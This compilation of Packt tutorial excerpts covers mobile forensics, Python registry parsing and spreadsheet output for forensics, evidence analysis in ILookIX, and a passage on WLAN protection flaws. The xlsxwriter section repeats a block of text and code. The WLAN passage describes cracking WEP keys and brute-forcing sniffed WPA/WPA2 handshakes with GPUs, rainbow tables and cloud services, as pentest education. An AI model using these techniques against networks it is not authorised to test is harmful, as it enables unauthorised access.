Lack of availability of tools: There is a wide range of mobile devices. A single tool may not support all the devices or perform all the necessary functions, so a combination of tools needs to be used. Choosing the right tool for a particular phone might be difficult.

Malicious programs: The device might contain malicious software or malware, such as a virus or a Trojan. Such malicious programs may attempt to spread to other devices over either a wired or a wireless interface.

Legal issues: Mobile devices might be involved in crimes that cross geographical boundaries. In order to tackle these multijurisdictional issues, the forensic examiner should be aware of the nature of the crime and the regional laws.

Summary

Mobile devices store a wide range of information, such as SMS messages, call logs, browser history, chat messages, location details, and so on. Mobile device forensics includes many approaches and concepts that fall outside the boundaries of traditional digital forensics. Extreme care should be taken while handling the device, right from the evidence intake phase to the archiving phase. Examiners responsible for mobile devices must understand the different acquisition methods and the complexities of handling the data during analysis. Extracting data from a mobile device is half the battle; the operating system, security features, and type of smartphone will determine the amount of access you have to the data. It is important to follow sound forensic practices and make sure that the evidence is unaltered during the investigation.

Resources for Article:

Further resources on this subject:

Forensics Recovery [article]
Mobile Phone Forensics – A First Step into Android Forensics [article]
Mobility [article]


Using the Registry and xlsxwriter modules

Packt
14 Apr 2016
12 min read
In this article by Chapin Bryce and Preston Miller, the authors of Learning Python for Forensics, we will learn about the features offered by the Registry and xlsxwriter modules. (For more resources related to this topic, see here.)

Working with the Registry module

The Registry module, developed by Willi Ballenthin, can be used to obtain keys and values from registry hives. Python provides a built-in registry module called _winreg; however, this module only works on Windows machines. The _winreg module interacts with the registry on the system running the module and does not support opening external registry hives. The Registry module allows us to interact with supplied registry hives and can be run on non-Windows machines.

The Registry module can be downloaded from https://github.com/williballenthin/python-registry. Click on the releases section to see a list of all the stable versions and download the latest version. For this article, we use version 1.1.0. Once the archived file is downloaded and extracted, we can run the included setup.py file to install the module. In a command prompt, execute the following code in the module's top-level directory:

python setup.py install

This should install the Registry module successfully on your machine. We can confirm this by opening the Python interactive prompt and typing import Registry. We will receive an error if the module is not installed successfully.

With the Registry module installed, let's begin to learn how we can leverage this module for our needs. First, we need to import the Registry class from the Registry module. Then, we use the Registry function to open the registry object that we want to query. Next, we use the open() method to navigate to our key of interest. In this case, we are interested in the RecentDocs registry key. This key contains recently active files separated by extension:

>>> from Registry import Registry
>>> reg = Registry.Registry('NTUSER.DAT')
>>> recent_docs = reg.open('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs')

If we print the recent_docs variable, we can see that it contains 11 values with five subkeys, which may contain additional values and subkeys. Additionally, we can use the timestamp() method to see the last written time of the registry key:

>>> print recent_docs
Registry Key CMI-CreateHive{B01E557D-7818-4BA7-9885-E6592398B44E}\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs with 11 values and 5 subkeys
>>> print recent_docs.timestamp() # Last Written Time
2012-04-23 09:34:12.099998

We can iterate over the values in the recent_docs key using the values() function in a for loop. For each value, we can access the name(), value(), raw_data(), value_type(), and value_type_str() methods. The value() and raw_data() methods represent the data in different ways: we use the raw_data() function when we want to work with the underlying binary data, and the value() function to gather an interpreted result. The value_type() and value_type_str() functions display a number or a string that identifies the type of data, such as REG_BINARY, REG_DWORD, REG_SZ, and so on:

>>> for i, value in enumerate(recent_docs.values()):
...     print '{}) {}: {}'.format(i, value.name(), value.value())
...
0) MRUListEx: ????
1) 0: myDocument.docx
2) 4: oldArchive.zip
3) 2: Salaries.xlsx
...
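The same pattern extends one level down. As a quick sketch (a hypothetical extension of the example above, reusing the recent_docs key we already opened), we can walk each extension subkey and print its values:

>>> for subkey in recent_docs.subkeys():
...     print subkey.name(), '-', subkey.timestamp()
...     for value in subkey.values():
...         print '  {}: {}'.format(value.name(), value.value())

The subkeys() function returns each child key as an object with the same name(), timestamp(), and values() methods we used on recent_docs, which makes recursive traversal of a hive straightforward.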
Another useful feature of the Registry module is the means it provides for querying for a certain subkey or value, via the subkey(), value(), or find_key() functions. A RegistryKeyNotFoundException is generated when a subkey is not present while using the subkey() function:

>>> if recent_docs.subkey('.docx'):
...     print 'Found docx subkey.'
...
Found docx subkey.
>>> if recent_docs.subkey('.1234abcd'):
...     print 'Found 1234abcd subkey.'
...
Registry.Registry.RegistryKeyNotFoundException: ...

The find_key() function takes a path and can find a subkey through multiple levels, whereas the subkey() and value() functions only search child elements. We can use these functions to confirm that a key or value exists before trying to navigate to it. If a particular key or value cannot be found, a custom exception from the Registry module is raised. Be sure to add error handling to catch this error and alert the user that the key was not discovered.

With the Registry module, finding keys and their values becomes straightforward. However, when the values are not strings, and are instead binary data, we have to rely on another module to make sense of the mess. For all binary needs, the struct module is an excellent candidate.

Creating Spreadsheets with the xlsxwriter Module

xlsxwriter is a useful third-party module that writes Excel output. There is a plethora of Excel-supported modules for Python, but we chose this module because it is highly robust and well documented. As the name suggests, this module can only be used to write Excel spreadsheets. The xlsxwriter module supports cell and conditional formatting, charts, tables, filters, and macros, among others.

Adding data to a spreadsheet

Let's quickly create a script called simplexlsx.v1.py for this example. On lines 1 and 2, we import the xlsxwriter and datetime modules. The data we are going to be plotting, including the header column, is stored as nested lists in the school_data variable. Each list is a row of information that we want to store in the output Excel sheet, with the first element containing the column names:

001 import xlsxwriter
002 from datetime import datetime
003
004 school_data = [['Department', 'Students', 'Cumulative GPA', 'Final Date'],
005     ['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)],
006     ['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)],
007     ['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)],
008     ['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]]

The writeXLSX() function, defined on line 11, is responsible for writing our data into a spreadsheet. First, we must create our Excel spreadsheet using the Workbook() function, supplying the desired name of the file. On line 13, we create a worksheet using the add_worksheet() function. This function can take the desired title of the worksheet or use the default name 'Sheet N', where N is the specific sheet number:

011 def writeXLSX(data):
012     workbook = xlsxwriter.Workbook('MyWorkbook.xlsx')
013     main_sheet = workbook.add_worksheet('MySheet')

The date_format variable stores a custom number format that we will use to display our datetime objects in the desired format. On line 17, we begin to enumerate through our data to write it. The conditional on line 18 is used to handle the header column, which is the first list encountered. We use the write() function and supply a numerical row and column. Alternatively, we can also use Excel notation, that is, A1.
With the Registry module, finding keys and their values becomes straightforward. However, when the values are not strings and are instead binary data, we have to rely on another module to make sense of the mess. For all binary needs, the struct module is an excellent candidate.

Creating Spreadsheets with the xlsxwriter Module

Xlsxwriter is a useful third-party module that writes Excel output. There are a plethora of Excel-supported modules for Python, but we chose this module because it is highly robust and well-documented. As the name suggests, this module can only be used to write Excel spreadsheets. The xlsxwriter module supports cell and conditional formatting, charts, tables, filters, and macros, among others.

Adding data to a spreadsheet

Let's quickly create a script called simplexlsx.v1.py for this example. On lines 1 and 2, we import the xlsxwriter and datetime modules. The data we are going to be plotting, including the header row, is stored as nested lists in the school_data variable. Each list is a row of information that we want to store in the output Excel sheet, with the first element containing the column names.

001 import xlsxwriter
002 from datetime import datetime
003
004 school_data = [['Department', 'Students', 'Cumulative GPA', 'Final Date'],
005     ['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)],
006     ['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)],
007     ['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)],
008     ['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]]

The writeXLSX() function, defined on line 11, is responsible for writing our data into a spreadsheet. First, we must create our Excel spreadsheet using the Workbook() function, supplying the desired name of the file. On line 13, we create a worksheet using the add_worksheet() function. This function can take the desired title of the worksheet or use the default name 'Sheet N', where N is the specific sheet number.

011 def writeXLSX(data):
012     workbook = xlsxwriter.Workbook('MyWorkbook.xlsx')
013     main_sheet = workbook.add_worksheet('MySheet')

The date_format variable stores a custom number format that we will use to display our datetime objects in the desired format. On line 17, we begin to enumerate through our data to write. The conditional on line 18 is used to handle the header row, which is the first list encountered. We use the write() function and supply a numerical row and column. Alternatively, we can also use the Excel notation, that is, A1.

015     date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'})
016
017     for i, entry in enumerate(data):
018         if i == 0:
019             main_sheet.write(i, 0, entry[0])
020             main_sheet.write(i, 1, entry[1])
021             main_sheet.write(i, 2, entry[2])
022             main_sheet.write(i, 3, entry[3])

The write() method will try to write the appropriate type for an object when it can detect the type. However, we can use different write methods to specify the correct format. These specialized writers preserve the data type in Excel so that we can use the appropriate data-type-specific Excel functions for the object. Since we know the data types within the entry list, we can manually specify when to use the general write() function or the specific write_number() function.

023         else:
024             main_sheet.write(i, 0, entry[0])
025             main_sheet.write_number(i, 1, entry[1])
026             main_sheet.write_number(i, 2, entry[2])

For the fourth entry in the list, the datetime object, we supply the write_datetime() function with our date_format defined on line 15. After our data is written to the workbook, we use the close() function to close and save our data. On line 32, we call the writeXLSX() function, passing it the school_data list we built earlier.

027             main_sheet.write_datetime(i, 3, entry[3], date_format)
028
029     workbook.close()
030
031
032 writeXLSX(school_data)

A table of the write functions and the objects they preserve is presented below:

Function          Supported objects
write_string      str
write_number      int, float, long
write_datetime    datetime objects
write_boolean     bool
write_url         str

When the script is invoked at the command line, a spreadsheet called MyWorkbook.xlsx is created. When we convert this to a table, we can sort it according to any of our values. Had we failed to preserve the data types, values such as our dates might have been identified as non-number types, preventing us from sorting them appropriately.

Building a table

Being able to write data to an Excel file and preserve the object type is a step up over CSV, but we can do better. Often, the first thing an examiner will do with an Excel spreadsheet is convert the data into a table and begin the frenzy of sorting and filtering. We can convert our data range to a table. In fact, writing a table with xlsxwriter is arguably easier than writing each row individually. The following code will be saved into the file simplexlsx.v2.py.

For this iteration, we have removed the initial list in the school_data variable that contained the header information. Our new writeXLSX() function writes the header separately.

004 school_data = [['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)],
005     ['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)],
006     ['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)],
007     ['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]]

Lines 10 through 14 are identical to the previous iteration of the function. Representing our table on the spreadsheet is accomplished on line 16.

010 def writeXLSX(data):
011     workbook = xlsxwriter.Workbook('MyWorkbook.xlsx')
012     main_sheet = workbook.add_worksheet('MySheet')
013
014     date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'})

The add_table() function takes multiple arguments. First, we pass a string representing the top-left and bottom-right cells of the table in Excel notation. We use the length variable, defined on line 15, to calculate the necessary length of our table.
The second argument is a little more confusing; it is a dictionary with two keys, named data and columns. The data key has a value of our data variable, which is perhaps poorly named in this case. The columns key defines each column header and, optionally, its format, as seen on line 19:

015     length = str(len(data) + 1)
016     main_sheet.add_table(('A1:D' + length), {'data': data,
017         'columns': [{'header': 'Department'}, {'header': 'Students'},
018             {'header': 'Cumulative GPA'},
019             {'header': 'Final Date', 'format': date_format}]})
020     workbook.close()

In fewer lines than in the previous example, we've managed to create a more useful output built as a table. Now our spreadsheet has our specified data already converted into a table and ready to be sorted. There are more possible keys and values that can be supplied during the construction of a table. Please consult the documentation at http://xlsxwriter.readthedocs.org for more details on advanced usage.

This process is simple when we are working with nested lists representing each row of a worksheet. Data structures not in the specified format require a combination of both methods demonstrated in our previous iterations to achieve the same effect. For example, we can define a table to span across a certain number of rows and columns and then use the write() function for those cells. However, to prevent unnecessary headaches, we recommend keeping data in nested lists.

Creating charts with Python

Lastly, let's create a chart with xlsxwriter. The module supports a variety of different chart types, including line, scatter, bar, column, pie, and area. We use charts to summarize the data in meaningful ways. This is particularly useful when working with large data sets, allowing examiners to gain a high-level understanding of the data before getting into the weeds.

Let's modify the previous iteration yet again to display a chart. We will save this modified file as simplexlsx.v3.py. On line 21, we are going to create a variable called department_grades. This variable will be our chart object, created by the add_chart() method. For this method, we pass in a dictionary specifying keys and values. In this case, we specify the type of the chart to be a column chart.

021     department_grades = workbook.add_chart({'type': 'column'})

On line 22, we use the set_title() function and again pass it a dictionary of parameters. We set the name key equal to our desired title. At this point, we need to tell the chart what data to plot. We do this with the add_series() function. The categories key maps to the Excel notation specifying the horizontal axis data. The vertical axis is represented by the values key. With the data to plot specified, we use the insert_chart() function to plot the data in the spreadsheet. We give this function a string of the cell at which to place the top-left of the chart and then the chart object itself.

022     department_grades.set_title({'name': 'Department and Grade distribution'})
023     department_grades.add_series({'categories': '=MySheet!$A$2:$A$5', 'values': '=MySheet!$C$2:$C$5'})
024     main_sheet.insert_chart('A8', department_grades)
025     workbook.close()

Running this version of the script will convert our data into a table and generate a column chart comparing departments by their grades. We can clearly see that, unsurprisingly, the Forensics department has the highest GPA earners in the school's program. This information is easy enough to eyeball for such a small data set.
However, when working with data that is orders of magnitude larger, creating summarizing graphics can be particularly useful for understanding the big picture. Be aware that there is a great deal of additional functionality in the xlsxwriter module that we will not use in our script. This is an extremely powerful module and we recommend it for any operation that requires writing Excel spreadsheets.

Summary

In this article, we began by introducing the Registry module and how it is used to obtain keys and values from registry hives. Next, we dealt with various aspects of spreadsheets, such as cells, tables, and charts, using the xlsxwriter module.

Resources for Article:

Further resources on this subject:

Test all the things with Python [article]
An Introduction to Python Lists and Dictionaries [article]
Python Data Science Up and Running [article]

Selecting and Analyzing Digital Evidence

Packt
08 Apr 2016
13 min read
In this article, Richard Boddington, the author of Practical Digital Forensics, explains how the recovery and preservation of digital evidence has traditionally involved imaging devices and storing the data in bulk in a forensic file or, more effectively, in a forensic image container, notably the ILookIX .ASB container. The recovery of smaller, more manageable datasets from the larger datasets held on a device or network system, using the ISeekDiscovery automaton, is now a reality. Whether the practitioner examines an image container or an extraction of information in the ISeekDiscovery container, it should be possible to overview the recovered information and develop a clearer perception of the type of evidence that should be located.

Once acquired, the image or device may be searched to find evidence, and locating evidence requires a degree of analysis combined with practitioner knowledge and experience. The process of selection involves analysis, and as new leads open up, the search for more evidence intensifies until, ultimately, a thorough search is completed. The searching process involves the analysis of possible evidence, from which evidence may be discarded, collected, or tagged for later reexamination, thereby instigating the selection process. The final two stages of the investigative process are the validation of the evidence, aimed at determining its reliability, relevance, authenticity, accuracy, and completeness, and finally, the presentation of the evidence to interested parties, such as the investigators, the legal team, and ultimately, the legal adjudicating body. (For more resources related to this topic, see here.)

Locating digital evidence

Locating evidence in the all-too-common large dataset requires some filtration of extraneous material, which has, until recently, been a mainly manual task of sorting the wheat from the chaff. It is important to clear away the clutter and noise of busy operating systems and applications, from which only a small amount of evidence really needs to be gleaned. Search processes involve searching in a file system and inside files, and common searches for files are based on names or patterns in their names, keywords in their content, and temporal data (metadata) such as the last accessed or written time.

A pragmatic approach to the examination is necessary, where the onus is on the practitioner to create a list of keywords or search terms to cull specific, probative, and case-related information from very large groups of files.

Searching desktops and laptops

Home computer networks are normally linked to the Internet via a modem and include various peripheral devices: a scanner, a printer, an external hard drive, a thumb drive storage device, a digital camera, and a mobile phone, shared among a range of users. In an office network, this would be a more complicated network system. The linked connections between the devices, the Internet, and the terminal leave a range of traces and logging records on the terminal and on some of the devices and Internet services. E-mail messages will be recorded externally on the e-mail server, the printer may keep a record of print jobs, and the external storage devices and communication media also leave logs and data linked to the terminal. All of this data may assist in the reconstruction of key events and provide evidence related to the investigation.

Using the logical examination process (booting up the image), it is possible to recover a limited number of deleted files and reconstruct some of the key events of relevance to an investigation.
It may not always be possible to boot up a forensic image and view it in its logical format, which is easier and more familiar to users. However, viewing the data inside a forensic image in its physical format provides unaltered metadata and a greater number of deleted, hidden, and obscured files, giving accurate information about applications and files. It is possible to view the containers that hold these histories and search records that have been recovered and stored in a forensic file container.

Selecting digital evidence

For those unfamiliar with investigations, it is quite common to misread the readily available evidence and draw incorrect conclusions. Business managers attempting to analyze what they consider to be the facts of a case would be wise to seek legal assistance in selecting and evaluating evidence on which they may wish to base a case. Selecting the evidence involves analysis of the located evidence to determine what events occurred in the system, their significance, and their probative value to the case.

The selection analysis stage requires the practitioner to carefully examine the available digital evidence, ensuring that they do not misinterpret the evidence and make imprudent presumptions without carefully cross-checking the information. It is a fact-finding process where an attempt is made to develop a plausible reconstruction of the facts. As in conventional crime investigations, practitioners should look for evidence that suggests or indicates motive (why?), means (how?), and opportunity (when?) for suspects to commit the crime, but in cases dependent on digital evidence, it can be a vexatious process. There are often too many potential suspects, which complicates the process of linking the suspect to the events.

The following figure shows a typical family network setup using Wi-Fi connections to the home modem that facilitates connection to the Internet. In this case, the parents provided the broadband service for themselves and for three other family members. The girlfriend of one of the children completed her university assignments on his computer and synchronized her iPad to his device.

The complexity of a typical household network and determining the identity of the transgressor

More effective forensic tools

Various forensic tools are available to assist the practitioner in selecting and collating data for examination, analysis, and investigation. Sorting order from the chaos of even a small personal computer can be a time-consuming and frustrating process. As the digital forensic discipline develops, better and more reliable forensic tools have been developed to assist practitioners in locating, selecting, and collating evidence from larger, complex datasets.

To varying degrees, most digital forensic tools used to view and analyze forensic images or attached devices provide helpful user interfaces for locating and categorizing information relevant to the examination. The most advanced application that provides access and convenient viewing of files is the Category Explorer feature in ILookIX, which divides files by type, signature, and properties. Category Explorer also allows the practitioner to create custom categories to group files by relevance. For example, in a criminal investigation involving a conspiracy, the practitioner could create a category for the first individual and a category for the second individual.
As files are reviewed, they would then be added to either or both categories. Unlike tags, files can be added to multiple categories, and the categories can be given descriptive names.

Deconstructing files

The deconstruction of files involves processing compound files such as archives, e-mail stores, registry stores, or other files to extract useful and usable data from a complex file format and generate reports. Manual deconstruction adds significantly to the time taken to complete an examination. Deconstructable files are compound files that can be further broken down into smaller parts, such as e-mails, archives, or thumb stores of JPG files. Once the deconstruction is completed, the files will move into either the deconstructed files folder or the deconstruction failed files folder. Deconstructable files will then be broken out further: e-mail, graphics, archives, and so on.

Searching for files

Indexing is the process of generating a table of text strings that can then be searched almost instantly any number of times. The two main uses of indexing are to create a dictionary to use when cracking passwords and to index the words for almost-instant searching. Indexing is also valuable when creating a dictionary or using any of the analysis functions built into ILookIX. ILookIX facilitates the indexing of the entire media at the time of initial processing, all at once. This can also be done after processing. Indexing facilitates searching through files and archives, the Windows Registry, e-mail lists, and unallocated space. This function is highly customizable via the setup option in order to optimize for searching or for creating a custom dictionary for password cracking. Sound indexing ensures speedy and accurate searching.

Searching is the process of having ILookIX look through the evidence for a specific item, such as a string of text or an expression. An expression, in terms of searching, is a pattern used to structure data in a search, such as a credit card number or an e-mail address.

The Event Analysis tool

ILookIX's Event Analysis tool provides the practitioner with a graphical representation of events on the subject system, such as file creation, access, or modification; e-mails sent or received; and other events such as the modification of the Master File Table on an NTFS system. The application allows the practitioner to zoom in on any point on the graph to view more specific details. Clicking on any bar on the graph will return the view to the main ILookIX window and display the items from the selected date bar in the List Pane. This can be most helpful when analyzing events during specific periods.

The Lead Analysis tool

Lead Analysis is an interactive evidence model embedded in ILookIX that allows the practitioner to assimilate known facts into a graphic representation that directly links unseen objects. It provides the answers as the practitioner increases the detail of the design surface and brings into view specific relationships that could otherwise go unseen. The primary aim of Lead Analysis is to help discover links within the case data that may not be evident or intuitive and that the practitioner may not be aware of directly, or may have too little background knowledge of to form relationships manually. Instead of finding and making note of various pieces of information, the analysis is presented as an easy-to-use link model. The complexity of the modeling is removed so that it gives the clearest possible method of discovery.
The analysis is based on the current index database, so it is essential to index case data prior to initiating an analysis. Once a list of potential links has been generated, it is important to review them to see whether any are potentially relevant. Highlight any that are, and it will then be possible to look for words in the catalogues if they have been included. In the example scenario, the word divorce was located, as it was known that Sarah was divorced from the owner of the computer (the initial suspect). By selecting any word with a single left-click and clicking on the green arrow to link it to Sarah, as shown below, relationships can be uncovered that are not always clear during the first inspection of the data.

Each of the stated facts becomes one starting lead on the canvas. If the nodes are related, it is easy to model that relationship by manually linking them together: select the first Lead Object to link, right-click, and select Add a New Port from the menu. This is then repeated for the second Lead Object the practitioner wants to link. By simply clicking on the new port of the object to be linked from and dragging to the port of the Lead Object it should be linked to, a line will appear linking the two together. It is then possible to iterate this process using each start node or discovered node until it is possible to make sense of the total case data. A simple relationship between suspects, locations, and even concepts is illustrated in the following screenshot:

ILookIX Lead Analysis discovering relationships between various entities

Analyzing e-mail datasets

Analyzing and selecting evidence from large e-mail datasets is a common task for the practitioner. ILookIX's embedded application E-mail Linkage Analysis is an interactive evidence model that helps practitioners discover links between the correspondents within e-mail data. The analysis is presented as an easy-to-use link model; the complexity of the modeling is removed to provide the clearest possible method of discovery. The results of the analysis are saved at the end of the modeling session for future editing. If there is a large amount of e-mail to process, the analysis generation may take a few minutes.

Once the analysis is displayed, the user will see the e-mail linkage itself. A line between correspondents indicates that they have a relationship of some type. Here in particular, line thickness indicates the frequency of traffic between two correspondents; thicker flow lines indicate more traffic. On the canvas, once the analysis is generated, the user may select any e-mail addressee node by left-clicking on it once; ILookIX will initiate a search for that addressee and list all e-mails where the selected addressee was a correspondent. Creating the analysis is really simple, and one of the most immediately valuable results it provides is group identification, as shown in the following screenshot. Users may make their own connection lines by clicking on an addressee node point and dragging to another node point. Nodes can be deleted to allow linkage between smaller groups of individuals.
The E-mail Linkage tool showing relationships of possible relevance to a case

The Volume Shadow Copy analysis tools

Shadow volumes, also known as the Volume Snapshot Service (VSS), use a service that creates point-in-time copies of files. The service is built into versions of Windows Vista, 7, 8, and 10 and is turned on by default. ILookIX can recover true copies of overwritten files from shadow volumes, as long as they resided on the volume at the time the snapshot was created. VSS recovery is a method of recovering extant and deleted files from the volume snapshots available on the system. ILookIX, unlike any other forensic tool, is capable of reconstructing volume shadow copies, either differential or full, including deleted files and folders.

In the test scenario, the tool recovered a total of 87,000 files, equating to conventional tool recovery rates. Using ILookIX's Xtreme File Recovery, some 337,000 files were recovered. The Maximal Full Volume Shadow Snapshot application recovered a total of 797,000 files. Using the differential process, 354,000 files were recovered, which isolated 17,000 additional files for further analysis. This enabled the detection of e-mail messages and attachments and Windows Registry changes that would normally remain hidden.

Summary

This article described in detail the process of locating and selecting evidence in terms of a general process. It also further explained the nature of digital evidence and provided examples of its value in supporting a legal case. Various advanced analysis and recovery tools were demonstrated to show the reader how technology can make the location and selection processes faster and more efficient. Some of these tools are not new but have been enhanced, while others are innovative and seek out evidence normally unavailable to the practitioner.

Resources for Article:

Further resources on this subject:

Mobile Phone Forensics – A First Step into Android Forensics [article]
Introduction to Mobile Forensics [article]
BackTrack Forensics [article]

Common WLAN Protection Mechanisms and their Flaws

Packt
07 Mar 2016
19 min read
In this article by Vyacheslav Fadyushin, the author of the book Building a Pentesting Lab for Wireless Networks, we will discuss various WLAN protection mechanisms and the flaws present in them. To be able to protect a wireless network, it is crucial to clearly understand which protection mechanisms exist and which security flaws they have. This topic will be useful not only for those readers who are new to Wi-Fi security, but also as a refresher for experienced security specialists. (For more resources related to this topic, see here.)

Hiding SSID

Let's start with one of the common mistakes made by network administrators: relying only on security by obscurity. In the frame of the current subject, it means using a hidden WLAN SSID (short for service set identifier), or simply a hidden WLAN name. A hidden SSID means that a WLAN does not send its SSID in the broadcast beacons advertising itself and doesn't respond to broadcast probe requests, thus making itself unavailable in the list of networks on Wi-Fi-enabled devices. It also means that normal users do not see that WLAN in their available networks list.

But the lack of WLAN advertising does not mean that an SSID is never transmitted in the air—it is actually transmitted in plaintext in a lot of packets exchanged between access points and the devices connected to them, regardless of the security type used. Therefore, SSIDs are always available to all the Wi-Fi network interfaces in range and visible to any attacker using various passive sniffing tools.

MAC filtering

To be honest, MAC filtering cannot even be considered a security or protection mechanism for a wireless network, but it is still called one in various sources. So let's clarify why we cannot call it a security feature. Basically, MAC filtering means allowing only those devices that have MAC addresses from a pre-defined list to connect to a WLAN, and not allowing connections from other devices. MAC addresses are transmitted unencrypted in Wi-Fi and are extremely easy for an attacker to intercept without even being noticed (refer to the following screenshot):

An example of a wireless traffic sniffing tool easily revealing MAC addresses

Keeping in mind the extreme simplicity of changing the physical address (MAC address) of a network interface, it becomes obvious why MAC filtering should not be treated as a reliable security mechanism. MAC filtering can be used to support other security mechanisms, but it should not be used as the only security measure for a WLAN.

WEP

Wired Equivalent Privacy (WEP) was born almost 20 years ago, at the same time as the Wi-Fi technology itself, and was integrated as a security mechanism into the IEEE 802.11 standard. As often happens with new technologies, it soon became clear that WEP contains weaknesses by design and cannot provide reliable security for wireless networks. Several attack techniques were developed by security researchers that allow them to crack a WEP key in a reasonable time and use it to connect to a WLAN or intercept network communications between the WLAN and client devices.

Let's briefly review how WEP encryption works and why it is so easy to break. WEP uses so-called initialization vectors (IVs) concatenated with a WLAN's shared key to encrypt transmitted packets. After encrypting a network packet, the IV is added to the packet as is and sent to the receiving side, for example, an access point. This process is depicted in the following flowchart:

The WEP encryption process
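To make the concatenation concrete, the following sketch builds a per-packet RC4 seed the way WEP does (the key value is made up for illustration; WEP-104 combines a 24-bit IV with a 104-bit shared key):

import os

wep_key = bytes.fromhex('0123456789abcdef0123456789')  # 104-bit shared key (made up)
iv = os.urandom(3)  # 24-bit initialization vector

# The per-packet RC4 seed is simply IV || shared key;
# the IV itself travels in cleartext next to the ciphertext
rc4_seed = iv + wep_key
print(len(rc4_seed) * 8)  # 128 bits

Because the IV space is only 24 bits, busy networks inevitably reuse IVs, which is exactly what the statistical attacks below exploit.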
An attacker just needs to collect enough IVs, which is a trivial task when using additional replay attacks to force victims to generate more IVs. Even worse, there are attack techniques that allow an attacker to penetrate WEP-protected WLANs even without connected clients, which makes those WLANs vulnerable by default. Additionally, WEP does not have cryptographic integrity control, which makes it vulnerable not only to attacks on confidentiality. There are numerous ways an attacker can abuse a WEP-protected WLAN, for example:

Decrypt network traffic using passive sniffing and statistical cryptanalysis
Decrypt network traffic using active attacks (a replay attack, for example)
Traffic injection attacks
Unauthorized WLAN access

Although WEP was officially superseded by the WPA technology in 2003, it can still sometimes be found in private home networks and even in some corporate networks (mostly belonging to small companies nowadays). But this security technology has become very rare and will not be used in the future, largely due to awareness in corporate networks and because manufacturers no longer activate WEP by default on new devices. In our humble opinion, device manufacturers should not include WEP support in their new devices at all, to avoid its usage and increase their customers' security. From the security specialist's point of view, WEP should never be used to protect a WLAN, but it can be used for Wi-Fi security training purposes.

Regardless of the security type in use, shared keys always add an additional security risk: users often tend to share keys, thus increasing the risk of key compromise and reducing accountability for key privacy. Moreover, the more devices use the same key, the greater the amount of traffic that becomes available to an attacker for cryptanalytic attacks, increasing their performance and chances of success. This risk can be minimized by using personal identifiers (a key or a certificate) for users and devices.

WPA/WPA2

Due to numerous WEP security flaws, the next generation of Wi-Fi security mechanisms became available in 2003: Wi-Fi Protected Access (WPA). It was announced as an intermediate solution until WPA2 became available and contained significant security improvements over WEP. Those improvements include:

Stronger encryption.
Cryptographic integrity control: WPA uses an algorithm called Michael instead of the CRC used in WEP. This is supposed to prevent altering data packets on the fly and protects against resending sniffed packets.
Usage of temporary keys: The Temporal Key Integrity Protocol (TKIP) automatically generates a new encryption key for every packet. This is the major improvement over static WEP, where encryption keys have to be entered manually in an AP config. TKIP still operates RC4, but the way it is used was improved.
Support for client authentication: The capability to use dedicated authentication servers for user and device authentication made WPA suitable for use in large enterprise networks.

Support for the cryptographically strong algorithm Advanced Encryption Standard (AES) was implemented in WPA, but it was not set as mandatory, only optional. Although WPA was a significant improvement over WEP, it was a temporary solution before WPA2 was released in 2004 and became mandatory for all new Wi-Fi devices.
WPA2 works very similarly to WPA, and the main differences between WPA and WPA2 lie in the algorithms used to provide security:

AES became the mandatory encryption algorithm in WPA2 instead of the default RC4 in WPA
TKIP used in WPA was replaced by the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)

Because of their very similar workflows, WPA and WPA2 are also vulnerable to similar or the same attacks, and are usually written together as WPA/WPA2. Both WPA and WPA2 can work in two modes: pre-shared key (PSK) or personal mode, and enterprise mode.

Pre-shared key mode

Pre-shared key or personal mode was intended for home and small office use, where networks have low complexity. We are more than sure that all our readers have met this mode and that most of you use it at home to connect your laptops, mobile phones, tablets, and so on to home networks. The general idea of PSK mode is using the same secret key on an access point and on a client device to authenticate the device and establish an encrypted connection for networking. The process of WPA/WPA2 authentication using a PSK consists of four phases and is also called a 4-way handshake. It is depicted in the following diagram:

WPA/WPA2 4-way handshake

The main WPA/WPA2 flaw in PSK mode is the possibility to sniff a whole 4-way handshake and brute-force the security key offline, without any interaction with the target WLAN. Generally, the security of a WLAN mostly depends on the complexity of the chosen PSK. Computing a PMK (short for pairwise master key), which is used in 4-way handshakes (refer to the handshake diagram), is a very time-consuming process compared to other computing operations, and computing hundreds of thousands of them can take very long. But if a short, low-complexity PSK is in use, a brute-force attack does not take long, even on a not-so-powerful computer. If a key is complex and long enough, cracking it can take much longer, but there are still ways to speed up the process:

Using powerful computers with CUDA (short for Compute Unified Device Architecture), which allows software to directly communicate with GPUs for computing. As GPUs are natively designed to perform mathematical operations and do them much faster than CPUs, the process of cracking works several times faster with CUDA.

Using rainbow tables that contain pairs of various PSKs and their corresponding precomputed hashes. They save a lot of time for an attacker, because the cracking software just searches for a value from an intercepted 4-way handshake in the rainbow tables and, if there is a match, returns the key corresponding to the given PMK, instead of computing PMKs for every possible character combination. Because a WLAN's SSID is used analogously to a cryptographic salt when computing the PMK, PMKs for the same key will differ for different SSIDs. This limits the application of rainbow tables to a number of the most popular SSIDs.

Using cloud computing is another way to speed up the cracking process, but it usually costs additional money. The more computing power an attacker can rent (or obtain in other ways), the faster the process goes. There are also online cloud-cracking services available on the Internet for various cracking purposes, including cracking 4-way handshakes.
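To make the salt analogy concrete: in PSK mode, the PMK is derived from the passphrase and the SSID using PBKDF2 with 4,096 iterations of HMAC-SHA1, producing a 256-bit key. A quick sketch with Python's standard library (the passphrase and SSID are made-up examples) shows why the same passphrase yields different PMKs on differently named networks:

import hashlib

# PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)
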